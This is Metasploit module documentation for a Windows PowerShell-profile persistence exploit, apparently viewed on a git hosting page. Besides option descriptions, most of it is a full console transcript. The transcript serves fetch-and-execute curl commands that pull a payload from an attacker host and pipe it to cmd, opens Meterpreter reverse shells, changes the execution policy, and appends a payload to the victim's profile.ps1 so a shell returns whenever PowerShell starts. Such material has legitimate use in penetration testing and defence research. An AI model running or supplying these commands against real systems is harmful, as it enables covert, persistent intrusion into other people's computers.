adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
14cd7fad47338dece127c39a7bfdeae8c362f732
metasploit-gs/documentation/modules/exploit/windows/persistence/powershell_profile.md
T
h00die 14cd7fad47 module docs
2026-04-14 09:45:44 -04:00

5.1 KiB
Raw Blame History

Vulnerable Application

Instructions to get the vulnerable application. If applicable, include links to the vulnerable install files, as well as instructions on installing/configuring the environment if it is different than a standard install. Much of this will come from the PR, and can be copy/pasted.

Verification Steps

  1. Start msfconsole
  2. Get a shell on Windows
  3. Do: use exploit/windows/persistence/powershell_profile
  4. Do: set payload [payload]
  5. Do: set session #
  6. Do: run
  7. You should get a shell when powershell is opened on the target machine.

Options

PROFILE

The powershell profile to target. Choices are AUTO, ALLUSERSALLHOSTS, ALLUSERSCURRENTHOST, CURRENTUSERALLHOSTS, CURRENTUSERCURRENTHOST. Defaults to AUTO

CREATE

If a profile file doesnt exist, create one. Defaults to false

EXECUTIONPOLICY

Attempt to update execution policy to execute. Defaults to true

Scenarios

Windows 10 1909 (10.0 Build 18363)

Initial shell

[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload windows/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
[*] Using configured payload windows/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/NB_U4Lr2Ty2xrjYqvzRVEg & start /B %TEMP%\mkaKJBzbDB.exe

[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /NB_U4Lr2Ty2xrjYqvzRVEg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450 
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
[*] Client 2.2.2.2 requested /w3
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Client 2.2.2.2 requested /NB_U4Lr2Ty2xrjYqvzRVEg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55201) at 2026-02-04 17:06:23 -0500

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...

Install Persistence

msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/powershell_profile 
[*] Using configured payload windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/powershell_profile) > set create true
create => true
msf exploit(windows/persistence/powershell_profile) > set EXECUTIONPOLICY true
EXECUTIONPOLICY => true
msf exploit(windows/persistence/powershell_profile) > set session 1
session => 1
msf exploit(windows/persistence/powershell_profile) > rexploit
[*] Reloading module...
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.1:4444 
msf exploit(windows/persistence/powershell_profile) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Powershell execution policy for CurrentUser (Undefined), will attempt to override
[*] Updating Powershell execution policy for CurrentUser to RemoteSigned
[*] C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 does not exist, creating it...
[-] Failed to create profile file at C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
[*] C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 does not exist, creating it...
[-] Failed to create profile file at C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1
[*] C:\Users\windows\Documents\WindowsPowerShell\profile.ps1 does not exist, creating it...
[*] Powershell command length: 4193
[*] Appending payload to C:\Users\windows\Documents\WindowsPowerShell\profile.ps1
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260204.1237/WIN10PROLICENSE_20260204.1237.rc

Start powershell on the target computer

[*] Sending stage (190534 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:55207) at 2026-02-04 17:13:02 -0500
Reference in New Issue View Git Blame Copy Permalink